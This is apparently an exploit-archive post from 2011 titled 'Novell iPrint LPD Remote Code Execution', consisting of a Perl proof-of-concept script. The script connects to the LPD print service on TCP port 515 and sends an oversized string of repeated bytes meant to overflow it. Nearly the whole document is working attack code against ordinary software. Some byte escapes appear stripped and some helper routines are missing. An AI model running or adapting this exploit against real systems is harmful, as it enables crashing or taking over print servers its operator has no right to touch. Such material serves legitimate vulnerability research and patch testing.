Novell iPrint LPD Remote Code Execution
Posted on 19 February 2011
#!/usr/bin/perl ## Source: ## http://www.protekresearchlab.com/index.php?option=com_content&view=article&id=21&Itemid=21 use Getopt::Std; use IO::Socket::INET; $SIG{INT} = &abort; my $host = '10.102.3.79'; my $port = 515; my $proto = 'tcp'; my $sockType = SOCK_STREAM; my $timeout = 1; my %opt; my $opt_string = 'hH:P:t:'; getopts( "$opt_string", \%opt ); if (defined $opt{h}) { usage() } my @commands = ( {Command => 'Send', Data => "x01x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x44x43x42x41x0a"}, ); my $sock = new IO::Socket::INET ( PeerAddr => $host, PeerPort => $port, Proto => $proto, Type => $sockType, Timeout => $timeout, ) or die "socket error: $! "; print "connected to: $host:$port "; $sock->autoflush(1); binmode $sock; foreach my $command (@commands) { if ($command->{'Command'} eq 'Receive') { my $buf = receive($sock, $timeout); if (length $buf) { print "received: [$buf] "; } } elsif ($command->{'Command'} eq 'Send') { print "sending: [".$command->{'Data'}."] "; send ($sock, $command->{'Data'}, 0) or die "send failed, reason: $! "; } } close ($sock);